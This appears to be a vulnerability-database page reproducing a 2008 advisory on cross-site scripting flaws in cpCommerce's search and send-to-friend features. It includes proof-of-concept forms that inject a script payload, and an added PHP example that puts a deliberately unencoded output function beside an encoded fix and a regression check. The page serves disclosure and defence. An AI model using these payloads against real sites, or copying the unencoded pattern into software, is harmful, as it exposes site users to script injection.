cpCommerce Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1184898
Vulnerability type: Cross-site scripting
Published: 2008-10-20
Updated: 2008-10-21
CVE ID: CVE-2008-4121
CNNVD-ID: CNNVD-200810-337
Platform: N/A
CVSS score: 4.3
|Vulnerability source
https://www.securityfocus.com/bid/31825
https://cxsecurity.com/issue/WLB-2008100054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-337
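|Vulnerability details
cpCommerce contains multiple cross-site scripting vulnerabilities. Remote attackers can inject arbitrary web script or HTML via the search parameter in the search.quick action of search.php and the name parameter in the sendtofriend action of sendtofriend.php.
|Exploit (EXP)
Cross Site Scripting (XSS) Vulnerability in cpcommerce,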
CVE-2008-4121 

References

http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
http://cpcommerce.cpradio.org/

Description

cpCommerce is an open-source e-commerce solution that is maintained by
templates and modules. 

Example

Assuming cpcommerce is installed on http://localhost/cpcommerce/,
anybody could inject JavaScript:

<form method="post" action="http://localhost/cpcommerce/search.php">
<input type="hidden" name="action" value="search.quick">
<input type="text" name="search" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
<input type="hidden" name="action" value="sendtofriend">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>

Disclosure Timeline

2008-09-23 Vendor contacted
2008-09-23 Vendor released 1.2.4
2008-10-19 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4121 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems. 

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with
help from Hanno Boeck [0]). It's licensed under the creative commons
attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de

[0] http://www.hboeck.de
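
Added example, not part of the original advisory and not cpCommerce's own code: the `">` prefix in the advisory's forms only matters if the request value is written into a double-quoted HTML attribute without encoding, so this sketch shows that pattern beside the encoded form and checks both with a DOM parse. The function names and the input markup are hypothetical, and PHP's DOM extension is assumed to be available.

```php
<?php
// Hypothetical reconstruction: the advisory does not show cpCommerce's
// template code, so the markup below is an assumed equivalent.

// Vulnerable pattern: request value copied into a quoted attribute as-is.
function render_search_field_unsafe(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '">';
}

// Hardened pattern: encode for the HTML attribute context.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
function render_search_field_safe(string $search): string
{
    $encoded = htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search" value="' . $encoded . '">';
}

// Regression check: parse the rendered markup and confirm the submitted
// text stayed inside the value attribute and created no <script> element.
function field_is_intact(string $html, string $expected): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate HTML parser warnings
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $inputs  = $doc->getElementsByTagName('input');
    $scripts = $doc->getElementsByTagName('script');

    return $scripts->length === 0
        && $inputs->length === 1
        && $inputs->item(0)->getAttribute('value') === $expected;
}

// The value used in both of the advisory's forms.
$payload = '"><script>alert(1)</script>';

var_dump(field_is_intact(render_search_field_unsafe($payload), $payload));
var_dump(field_is_intact(render_search_field_safe($payload), $payload));
```

The same check applies to the name parameter of sendtofriend.php, since both forms in the advisory use the same attribute-breaking value.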


|Affected products
cpCommerce cpCommerce 1.2.3
cpCommerce cpCommerce 1.1
cpCommerce cpCommerce 0.5 f
|References

Source: BUGTRAQ
Name: 20081019 Cross Site Scripting (XSS) Vulnerability in cpcommerce, CVE-2008-4121
Link: http://www.securityfocus.com/archive/1/archive/1/497545/100/0/threaded
Source: MISC
Link: http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
Source: SREASON
Name: 4448
Link: http://securityreason.com/securityalert/4448
Source: SECUNIA
Name: 32353
Link: http://secunia.com/advisories/32353
Source: cpcommerce.cpradio.org
Link: http://cpcommerce.cpradio.org/